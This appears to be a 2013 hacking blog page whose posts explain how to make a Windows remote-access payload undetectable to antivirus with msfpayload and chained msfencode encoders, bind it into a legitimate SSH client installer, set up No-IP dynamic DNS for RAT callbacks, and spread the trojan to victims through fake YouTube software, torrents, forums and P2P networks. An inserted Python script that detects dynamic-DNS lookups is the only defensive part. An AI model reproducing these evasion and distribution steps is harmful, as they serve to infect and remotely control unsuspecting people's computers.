Showing posts with label Ratss. Show all posts

Friday, October 4, 2013

How To Bypass Antivirus Detection - Making An Executable FUD



In this tutorial we will show you, step by step, how to make a virus Fully Undetectable (FUD) by all the antiviruses. Though there are lots of approaches, our team member Malik Rafay has managed to find a way to make an executable FUD using msfencode.

Requirements 

A BackTrack machine, real or virtual. I used BackTrack 5 R3, but other versions of BackTrack work OK too.

Attention !!!

We are using some harmless test files, but don't infect people with any real viruses. That's a crime, and we here at hax0rtools are not responsible for it.

Purpose:


Antivirus protects machines from malware, but not all of it. There are ways to pack malware to make it harder to detect. We'll use Metasploit to render malware completely invisible to antivirus.


Creating a Listener:


This is a simple payload that gives the attacker remote control of a machine. It is not a virus and won't spread, but it is detected by antivirus engines. In BackTrack, in a Terminal window, execute these commands:


cd
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe


You should see the listen.exe file as shown below: 


Analyzing the Listener with VirusTotal

Go to https://www.virustotal.com/en/

Click the "Choose File" button. Navigate to /root and double-click listen.exe. "listen.exe" appears in the "Choose File" box, as shown below:

In the VirusTotal web page, click the "scan it" button.
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that many of the antivirus engines detected the file--33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.

Encoding the Listener


This process will encode the listener and insert it into an innocent SSH file.
In BackTrack, in a Terminal window, execute these commands:
wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe
msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1
ls -l evil*

You should see the evil_ssh.exe file as shown below:


Scan with VirusTotal

Go to: https://www.virustotal.com/
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that fewer of the antivirus engines detect the file now--21 out of 42, when I did it, as shown below. You may see different numbers.
 

Encode the Listener Again

This process will encode the listener with several different encodings.
In BackTrack, in a Terminal window, execute these commands:

msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1
ls -l listen*

You should see several files as shown below:

Analyzing Again

The analysis shows that fewer of the antivirus engines detect the file now--0 out of 42, when I did it, as shown below. You may see different numbers.

Saturday, September 21, 2013

How To Create No-iP Host




The No-IP program offers you many services, and is used by a hacker to connect to the victim.



1. Start Off By Going To; No-IP.com And Register. If You Have An Account There Already, Then Just Log In.

2. Once You've Logged In, Press "Add Host"

[Image: NOIP1.png]

3. Now It's Time To Choose Your Host Name!

[Image: NoIP2-1.png]

--//--

Hostname: Your Host Name, EG:
YourHostName.no-ip.biz
Host Type: DNS Host (A)

Don't Care About The Rest. Once You've Chosen Your Host Name, Press "Create Host" In The Lower Right Corner.

The Host Is Now Finished! Lets Move On To The No-IP Client.

1. The No-IP Client You Downloaded In The Beginning, Extract It To Your Desktop & Install It.

2. Now When You've Installed It, Open It Up & Log In With Your No-ip Username & Password.

3. When You're Logged In Press "Select Hosts" And Then Check That Little Box With Your Hostname.

[Image: AP2uIE.png]

--// Note: Always Have No-IP Open When You Have RAT Open!
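
A defender's view of the setup above, as an added example that is not part of the original post: a RAT that calls back to a dynamic-DNS name such as YourHostName.no-ip.biz leaves lookups in resolver logs, so the Python below flags internal clients that resolve hosts under dynamic-DNS zones. The log format, the sample lines and every zone other than no-ip.biz are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Dynamic-DNS zones to watch. no-ip.biz is the zone named in the post; the
# others are assumed additions that a real deployment would tune.
DDNS_ZONES = {"no-ip.biz", "no-ip.org", "no-ip.info", "ddns.net", "hopto.org"}

# Constructed sample resolver log: "<timestamp> <client-ip> <qtype> <qname>"
SAMPLE_LOG = """\
2013-09-21T10:00:01Z 10.0.0.15 A www.example.com.
2013-09-21T10:00:05Z 10.0.0.23 A YourHostName.no-ip.biz.
2013-09-21T10:01:05Z 10.0.0.23 A yourhostname.no-ip.biz
2013-09-21T10:01:09Z 10.0.0.15 A notno-ip.biz.
2013-09-21T10:02:11Z 10.0.0.42 AAAA box.home.ddns.net.
malformed line without enough fields
"""

LINE_RE = re.compile(r"^(\S+)\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(A|AAAA)\s+(\S+)$")


def ddns_zone(qname, zones=DDNS_ZONES):
    """Return the dynamic-DNS zone that qname is a host under, or None."""
    labels = qname.rstrip(".").lower().split(".")
    # Compare whole labels so "notno-ip.biz" does not match "no-ip.biz";
    # start at 1 so the provider's own apex (e.g. "no-ip.biz") is ignored.
    for i in range(1, len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in zones:
            return candidate
    return None


def find_ddns_lookups(log_text):
    """Map client IP -> sorted list of distinct dynamic-DNS names it resolved."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not parse
        client, qname = m.group(2), m.group(4)
        if ddns_zone(qname):
            hits[client].add(qname.rstrip(".").lower())
    return {client: sorted(names) for client, names in hits.items()}


if __name__ == "__main__":
    for client, names in sorted(find_ddns_lookups(SAMPLE_LOG).items()):
        print(client, "->", ", ".join(names))
```

Dynamic DNS also has legitimate uses, so a hit is a lead to correlate with the client's outbound connections rather than a verdict.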

How To Get More Victims To Your Rat




Maybe you saw some people get hundreds of victims every day They rely on the penetration of random And all their victims from popular forums and torrent Today I will explain to you the ways in which they use .



Sources of the victims :

Torrrent
Social networks & Forums
Sites publish the files like dvb-upload.com
Chat rooms

How to get victims :

  • Create a fake software  Has become a widespread phenomenon in youtubeYou can experiment and you'll get thousands of victims But you first have to increase the number of Views I advise you to use vagex.com and Of course you you must to disable comment on your video
  • Torrent the best source of victim you can easily create your account in thepiratebay.com and create a torent using Any program that supports torrent just choose a software and inject or bind this software with your clean server and do not forget to add trackers  in your torrent

  • from the forums you can get a lot of victims Some times I put private software and remember Do not put a download link But (Pm Me :D for mediafire link) To target members :) So this method is not in all forums you can put the link in the warez site There is no need not explain :)
Some professional hackers Use other ways They scan  A large number of Random Ip To discover Exploit Will generally put a special topic in this type ...
And finally offer you a program named  Spread Robot With this program you can spread your server in(Shareaza - Areas - eMule )

The main interface of the program:


Click Get Warez :

and choose the path of your server and Make Warez File :

Then the software will create a file in which each of these programs and share the files in (Shareaza - Areas - eMule )


 Always select Icon Setup or Install the Server and pumb the files  Even up to 2mg  using hex workshop
